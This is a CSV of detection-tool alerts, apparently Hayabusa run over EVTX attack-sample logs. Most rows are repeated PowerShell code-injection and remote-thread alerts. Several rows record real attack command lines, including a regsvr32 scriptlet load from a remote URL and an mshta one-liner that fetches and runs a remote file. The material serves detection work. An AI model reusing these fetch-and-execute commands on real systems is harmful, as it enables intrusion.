Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd 